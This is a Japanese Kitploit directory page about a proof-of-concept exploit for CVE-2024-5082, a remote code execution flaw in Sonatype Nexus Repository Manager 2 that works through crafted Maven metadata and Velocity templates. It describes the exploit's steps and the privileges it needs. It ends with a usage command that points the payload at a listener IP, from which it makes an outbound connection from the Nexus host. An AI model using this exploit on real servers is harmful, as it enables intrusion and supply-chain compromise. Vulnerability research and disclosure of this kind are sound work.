Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-5082 — CVE-2024-5082の概念実証エクスプロイト。巧妙に細工されたMavenアーティファクトとVelocityテンプレート処理を介したSonatype Nexus Repository Manager 2のリモートコード実行の脆弱性です。 | Kitploit
ツール/GitHubGitHub/h4mr3r/cve-2024-5082
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストサプライチェーンセキュリティペイロード開発
GitHubh4mr3r/cve-2024-5082

CVE-2024-5082

CVE-2024-5082の概念実証エクスプロイト。巧妙に細工されたMavenアーティファクトとVelocityテンプレート処理を介したSonatype Nexus Repository Manager 2のリモートコード実行の脆弱性です。

リポジトリを見る
121ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

概要

このリポジトリには、Sonatype Nexus Repository Manager 2 におけるリモートコード実行の脆弱性 CVE-2024-5082 の Python 概念実証コードが含まれています。

この脆弱性により、十分な権限を持つユーザーが特別に細工された Maven アーティファクトを公開し、Velocity コンテンツジェネレーターによる処理対象としてマークできるようになります。アーティファクトが取得されると、埋め込まれた Velocity テンプレートが Nexus によって評価され、Nexus JVM のセキュリティコンテキストで任意のコマンドが実行される可能性があります。

Sonatype によると:

  • 影響を受けるバージョンは Nexus Repository Manager 2.x の 2.15.1 までです。
  • この問題は 2.15.2 で修正されました。
  • Nexus Repository 2 は 2025年6月30日 にサポート終了となり、Nexus Repository 3 への移行が必要です。

重要な範囲の明確化

コマンドは Nexus Repository ホスト 上で実行されます。

影響を受けるアーティファクトをビルドサーバー、アプリケーションサーバー、または開発ワークステーションにダウンロードしても、それだけでコンシューマ側で埋め込まれたコマンドが実行されるわけではありません。ただし、リポジトリマネージャーが侵害されると、攻撃者が後で信頼されたアーティファクト、ビルド入力、認証情報、またはリポジトリ設定を変更した場合、より広範なサプライチェーンリスクが生じる可能性があります。

PoC の動作仕組み

スクリプトは以下の処理を行います:

  1. Maven 形式の名前空間の下に一意のマーカーパスを生成します。
  2. 選択したホスト型リポジトリに細工された maven-metadata.xml ファイルをアップロードします。
  3. 対応する Nexus 属性を更新して、コンテンツジェネレーターを velocity に設定します。
  4. アップロードしたアーティファクトを取得し、Nexus にテンプレートを処理させます。
  5. クリーンアップ中にアップロードしたマーカーアーティファクトの削除を試みます。

提供されるペイロードは、Nexus ホストから設定されたリスナーアドレスへの外向け TCP 接続を作成します。

認証と権限

現在のスクリプトは HTTP Basic 認証を使用し、以下を必要とします:

  • 有効な Nexus ユーザー名とパスワード。
  • 選択したリポジトリ内のコンテンツを作成または更新する権限。
  • PoC で使用される属性更新の権限。

使用方法

root@kitploit:~
python3 cve_2024_5082.py \\
  --base-url https://nexus.example.test/nexus \\
  --repository security-test-snapshots \\
  --username test-user \\
  --password 'REDACTED' \\
  --lhost LISTENER_IP \\
  --lport 8000
ツールをダウンロード